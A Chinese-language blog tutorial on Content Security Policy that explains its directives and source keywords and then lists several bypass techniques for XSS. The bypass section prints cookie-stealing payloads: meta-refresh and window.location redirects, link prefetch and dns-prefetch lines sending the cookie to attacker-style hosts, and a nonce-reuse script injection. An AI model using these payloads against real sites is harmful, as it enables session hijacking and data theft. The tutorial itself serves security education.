CSP策略和绕过

什么是CSP策略

网页安全政策，“Content Security Policy”，缩写 CSP。
CSP的实质就是白名单制度，明确告诉客户端哪些外部资源可以加载和执行。

一个CSP头由多组CSP策略组成，中间由分号分隔，就像这样：
Content-Security-Policy: default-src 'self' www.baidu.com; script-src 'unsafe-inline'

CSO誉为专门为解决XSS攻击而生的神器

如何启用CSP策略

一种是通过 HTTP 头信息的Content-Security-Policy的字段
一种是通过网页的标签

CSP是如何解析的

嵌套在CSP中的策略

script-src：定义了页面中Javascript的有效来源
style-src：定义了页面中CSS样式的有效来源
img-src：定义了页面中图片和图标的有效来源
connect-src：定义了请求、XMLHttpRequest、WebSocket 和 EventSource 的连接来源
child-src：指定定义了web workers 以及嵌套的浏览上下文（如和）的源</code><br> default-src ：一次性包括了上面的所有</p> <h2 id="内容源有三种源列表关键字和数据">内容源有三种：源列表、关键字和数据</h2> <h4 id="内容源可以理解为上面的策略中的实际策略">内容源可以理解为上面的策略中的实际策略</h4> <h3 id="源列表">源列表：</h3> <p>http://*.foo.com （匹配所有使用 http协议加载 foo.com 任何子域名的尝试。）<br> mail.foo.com:443 （匹配所有访问 mail.foo.com 的 443 端口的尝试。）<br> https://store.foo.com （匹配所有使用 https协议访问 store.foo.com 的尝试。）<br> 比如CSP策略为：，那么只允许dz.com这个域下的资源才能够进行引入<br> 那么只有访问为http://dz.com/test.php?csp=，只有1.js才可以被引入被触发</p> <h3 id="关键字">关键字：</h3> <p>'none'：代表空集；即不匹配任何 URL。两侧单引号是必须的<br> 'self'：代表和文档同源，包括相同的 URL 协议和端口号。两侧单引号是必须的<br> 'unsafe-inline'：允许使用内联资源，如内联的，这种情况只能在dz.com域下才能进行引入script资源<br> 如果CSP策略为：Content-Security-Policy: script-src 'none' dz.com，<br> 这种情况也是一样的，script-src包括了两者，none和dz.com，后者会覆盖前者，那么也就是允许script-src引入dz.com域下的资源，那么就跟上面的效果是一样的！</p> <h3 id="数据">数据：</h3> <p>data:允许data: URI作为内容来源<br> mediastream:允许mediastream: URI作为内容来源。<br> 比如CSP策略为：<br> <code>Content-Security-Policy: default-src 'self'; img-src 'self' data:; media-src mediastream:</code></p> <p>这里拿一段标签中的CSP策略来进行解释：<br> <code><meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:"></code></p> <p>上面代码中，CSP 做了如下配置：</p> <pre><code>脚本script的src只信任当前域名（满足同源策略的条件） <object>标签中的src不信任任何URL，即不加载任何资源样式表style中只信任cdn.example.org和third-party.org 框架（frame）：必须使用HTTPS协议加载其他资源：没有限制 </code></pre> <h1 id="csp绕过方式">CSP绕过方式</h1> <h4 id="csp的设置可能情况太多这里只讨论几个比较典型的情况其他的日后补充">CSP的设置可能情况太多，这里只讨论几个比较典型的情况，其他的日后补充</h4> <h2 id="url跳转">url跳转</h2> <p>在default-src 'none'的情况下，可以使用meta标签实现跳转</p> <p><code><meta http-equiv="refresh" content="1;url=http://www.xss.com/x.php?c=[cookie]" ></code></p> <p>在允许unsafe-inline的情况下，可以用window.location，或者window.open之类的方法进行跳转绕过。</p> <pre><code><script> window.location="http://www.xss.com/x.php?c=[cookie]"; </script> </code></pre> <h2 id="标签预加载">标签预加载</h2> <p>CSP对link标签的预加载功能考虑不完善。<br> 在Chrome下，可以使用如下标签发送cookie</p> <p><code><link rel="prefetch" href="http://www.xss.com/x.php?c=[cookie]"></code></p> <p>在Firefox下，可以将cookie作为子域名，用dns预解析的方式把cookie带出去，查看dns服务器的日志就能得到cookie</p> <p><code><link rel="dns-prefetch" href="//[cookie].xxx.ceye.io"></code></p> <h2 id="利用浏览器补全">利用浏览器补全</h2> <p>有些网站限制只有某些脚本才能使用，往往会使用<script>标签的nonce属性，只有nonce一致的脚本才生效，比如CSP设置成下面这样：</p> <pre><code>Content-Security-Policy: default-src 'none';script-src 'nonce-abc' </code></pre> <p>那么当脚本插入点为如下的情况时</p> <pre><code><p>插入点</p> <script id="aa" nonce="abc">document.write('CSP');</script> </code></pre> <p>这样会拼成一个新的script标签，其中的src可以自由设定</p> <pre><code><p><script src=//14.rs a="</p> <script id="aa" nonce="abc">document.write('CSP');</script> </code></pre> </div>  <div class="p-2"></div> <div class="arcinfo my-3 fs-7 text-center"> <a href='/t/etagid162-0.html' class='tagbtn' target='_blank'>网络安全</a><a href='/t/etagid14121-0.html' class='tagbtn' target='_blank'>CTFer</a> </div> <div class="p-2"></div> </div> <div class="p-2"></div>  <div class="lbox p-4 shadow-sm rounded-3"> <div class="boxtitle"><h2 class="fs-4">相关</h2></div> <hr> <div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-498218.html">为什么要做网络安全等级保护测评</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-492230.html">网络安全笔记</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-478426.html">网络安全（一）：常见的网络威胁及防范</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-433166.html">安全测试---web常规安全漏洞问题介绍和防范说明，如：SQL注入攻击、XSS跨站点脚本攻击（JS注</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-411470.html">长安“战疫”网络安全卫士守护赛部分writeup</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-382966.html">前端网络安全——密码安全</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-360100.html">网络安全基础</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-312501.html">[网络安全学习篇1]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-311315.html">网络安全之接入控制</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-294557.html">长安“战疫”网络安全公益赛的一些随想</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-271800.html">第三届江西省网络安全大赛-部分Crypto</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div><div class="row g-0 py-2 border-bottom align-items-center"> <div class="col-7 col-lg-11 border-lg-end"> <h3 class="fs-6 mb-0 mb-lg-2"><a href="/a/1-240839.html">网络四（网络安全）</a></h3> <div class="ltag fs-8 d-none d-lg-block"> </div> </div> </div>   </div>  </div> <div class="col-lg-3 col-12 p-0 ps-lg-2">     <div class="lbox p-4 shadow-sm rounded-3"> <div class="boxtitle pb-2"><h2 class="fs-4"><a href="#">标签</a></h2></div> <div class="clearfix"></div> <ul class="m-0 p-0 fs-7 r-tag"> </ul> <div class="clearfix"></div> </div>  </div> </div> </div> </main> <div class="p-2"></div> <footer> <div class="container-fluid p-0 bg-black"> <div class="container p-0 fs-8"> <p class="text-center m-0 py-2 text-white-50">一品网 <a class="text-white-50" href="https://beian.miit.gov.cn/" target="_blank">冀ICP备14022925号-6</a></p> </div> </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?6e3dd49b5f14d985cc4c6bdb9248f52b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> </footer> <script src="/skin/bootstrap.bundle.js"></script> </body> </html>